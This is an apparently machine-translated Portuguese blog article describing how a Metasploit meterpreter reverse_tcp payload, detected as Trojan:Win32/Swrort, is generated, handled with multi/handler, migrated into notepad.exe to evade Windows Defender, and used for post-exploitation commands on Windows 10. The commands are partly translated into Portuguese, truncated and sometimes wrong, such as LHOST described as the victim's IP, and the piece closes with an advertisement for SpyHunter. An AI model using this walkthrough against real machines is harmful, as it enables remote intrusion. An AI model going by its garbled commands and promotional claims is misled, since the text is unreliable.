Nome | troiano:Win32 / Swrort |
Tipo | troiano |
Pequena descrição | Ler e escrever permissões no Windows 10. Permite que o atacante para infectar outro PC conectado à uma infectado. |
Os sintomas | Aparecimento de um arquivo .exe desconhecida. |
distribuição Método | mails de spam. ataques MITM, redirecionamentos maliciosos. |
ferramenta de detecção | Baixar SpyHunter, Para ver se o sistema tiver sido afetada por Trojan:Win32 / Swrort |
A perigosa façanha foi descoberto no Windows 10, usando um troiano:Win32 / Swrort para ignorar o Windows Defender e leitura ganho e escrever permissões. Anonymous pesquisador demonstrou a vulnerabilidade de um canal, chamado Metasploitstation. Ele mostra 3 fases em que você pode deslizar passado do Windows 10 defesas. Não houve informações descoberto até agora sobre se esta façanha foi corrigido ou nenhuma.
janelas 10 Multihandler Exploit Infection – Como fazer isso?
No vídeo, o usuário tech-savvy demonstrou uma simulação de um arquivo ‘123.EXE’ que ele cria e executa como se ele foi aberto no mundo real como um anexo a um e-mail ou executados por outro método. Decidimos dividir o processo de infecção em três fases para ajudar você a entender melhor a metodologia.
Estágio 1: Preparação arquivo
O hacker cria uma carga útil com essa configuração em um ambiente Linux:
→janelas msfpaayload / meterpreter / reverse_tcp LHOST =
portnumber1 * – Esta é a porta utilizada para o ataque. Ele pode ser qualquer porta (4444, 4324, etc.). Temos escrito portnumber1 desde que ele usa uma segunda portnumber que chamamos
Após esta fase está completa e o arquivo é criado pelo atacante e caiu sobre o sistema do usuário, o atacante pode proceder à Fase 2.
Estágio 2: Usando o exploit.
Neste ponto, o invasor usa o multihandler para fazer com que visualize o .exe e aproveite a exploração para abrir uma sessão ativa(conectar) para o PC da vítima.
Isso pode acontecer usando as linhas de comando atuais:
→msfconsole (Para iniciar o console. Abre a interface ‘msf>’)
Em 'msf', o invasor pode executar os seguintes comandos:
→msf> use exploit / multi / handler
definir lhost 'endereço IP da vítima’
definir lport ‘portnumber1’
Depois disso, o invasor executa a carga útil para estabelecer uma sessão:
→msfexploit(manipulador)> definir janelas de carga útil / meterpreter / reverse_tcp
Para verificar se uma sessão ativa é possível, o invasor escreve o comando msfexploit(manipulador)> mostrar opções que permitem que ele veja isso
→Processo EXITFUNC sim Técnica de saída(aceitaram: Vejo, fio..)
Endereço IP da vítima LHOST sim A porta de escuta
LPORT portnumber1 sim O endereço de escuta
Isso permite que ele veja se configurou as configurações corretamente e pode prosseguir com a infecção real do computador.
Estágio 3: Infecção
O comando que o atacante usa para iniciar uma sessão ativa com a vítima é 'explorar'. Depois de executar este comando, o arquivo ‘123.exe’ retornou com esta resposta:
→[*] Manipulador reverso iniciado em
[*] Iniciando o manipulador de carga útil…
Neste ponto, o executável foi iniciado na máquina Windows. Apesar do software Windows Defender estar em execução, não parou o ataque. No entanto, quando verificado em busca de vírus, o programa antivírus do Windows detectou imediatamente ‘123.exe’ como um Trojan:Win32 / Swrort.A.
Para evitar a detecção, o atacante usou uma tática, chamado de migração, que criou um arquivo ‘notepad.exe’ que migra a sessão ativa de ‘123.exe’ para este arquivo ao conectar. Isso foi feito usando o comando:
→meterpreter> executar post / windows / manage / migrate
Depois de migrar o processo e repetir a mesma simulação, mas usando
De lá, o invasor demonstrou permissões completas de leitura e gravação criando uma nova pasta com um novo documento de texto. Tanto quanto sabemos os principais comandos que podem ser usados após a conexão são:
→> sysinfo - para mostrar a versão do sistema e informações.
> você :/
> shell - para mostrar a versão do Windows e outras informações.
> getwid - mostra o Windows ID.
> ps –aux - exibe todos os arquivos .exe em execução no Gerenciador de Tarefas do Windows.
> ifconfig - exibe informações sobre interfaces (Endereços IP e outras informações). Este comando fornece ao invasor as informações para se conectar a outro computador que esteja na mesma NIC e VLAN do PC infectado. Isso pode ser muito devastador para redes domésticas ou de escritório, caso esse ataque seja bem organizado.
janelas 10 exploits – Conclusão
Não há informações reais sobre se este exploit foi corrigido ou não, mas como com qualquer outro software, pode haver mais descobertos. É por isso que caso você esteja usando o Windows 10, recomendamos baixar e instalar o programa de proteção contra malware avançado. Ele irá protegê-lo ativamente e se atualizar regularmente com as ameaças mais recentes. Além disso, tal programa tem escudos ativos que detectam imediatamente quaisquer conexões não autorizadas.
digitalizador Spy Hunter só irá detectar a ameaça. Se você quiser a ameaça de ser removido automaticamente, você precisa comprar a versão completa da ferramenta anti-malware.Saiba Mais Sobre SpyHunter Anti-Malware Ferramenta / Como desinstalar o SpyHunter